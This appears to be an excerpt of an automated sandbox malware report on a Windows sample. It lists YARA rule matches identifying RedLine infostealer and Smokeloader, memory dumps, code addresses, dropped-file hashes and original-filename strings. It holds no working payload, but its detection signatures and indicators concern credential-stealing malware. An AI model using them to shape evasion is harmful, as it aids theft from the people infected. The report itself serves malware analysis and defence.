Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: IoUNtL.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00408C60 0_2_00408C60
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040DC11 0_2_0040DC11
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00407C3F 0_2_00407C3F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00418CCC 0_2_00418CCC
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00406CA0 0_2_00406CA0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004028B0 0_2_004028B0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0041A4BE 0_2_0041A4BE
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00418244 0_2_00418244
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00401650 0_2_00401650
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00402F20 0_2_00402F20
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004193C4 0_2_004193C4
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00418788 0_2_00418788
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00402F89 0_2_00402F89
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00402B90 0_2_00402B90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004073A0 0_2_004073A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00617856 0_2_00617856
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006118A0 0_2_006118A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00613170 0_2_00613170
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006131D9 0_2_006131D9
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006289D8 0_2_006289D8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00612B00 0_2_00612B00
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00628494 0_2_00628494
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00612DE0 0_2_00612DE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0061DE61 0_2_0061DE61
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00616EF0 0_2_00616EF0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00618EB0 0_2_00618EB0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00617E8F 0_2_00617E8F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0062A70E 0_2_0062A70E
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00628F1C 0_2_00628F1C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006177C2 0_2_006177C2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_021D1ED2 0_2_021D1ED2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_021D1EE0 0_2_021D1EE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDC559 0_2_05FDC559
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDA1E0 0_2_05FDA1E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDE230 0_2_05FDE230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDDCB7 0_2_05FDDCB7
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDE562 0_2_05FDE562
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FD94A8 0_2_05FD94A8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_05FDF390 0_2_05FDF390
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_06063478 0_2_06063478
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0606F2E0 0_2_0606F2E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0606FA30 0_2_0606FA30
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_06067920 0_2_06067920
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060A1A68 0_2_060A1A68
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060A7F80 0_2_060A7F80
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060A2A09 0_2_060A2A09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060A2A18 0_2_060A2A18
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060DC54C 0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060D90C8 0_2_060D90C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060D7D87 0_2_060D7D87
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060DC54C 0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060DC54C 0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_06102228 0_2_06102228
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F46076 1_2_00F46076
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F46D00 1_2_00F46D00
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\IoUNtL.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: String function: 0061E428 appears 44 times
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Binary or memory string: OriginalFilename vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037846605.000000000075C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037635710.0000000000757000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclrjit.dllT vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037385085.000000000074F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMopoke.exe4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037350432.0000000000736000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2037587042.0000000000756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
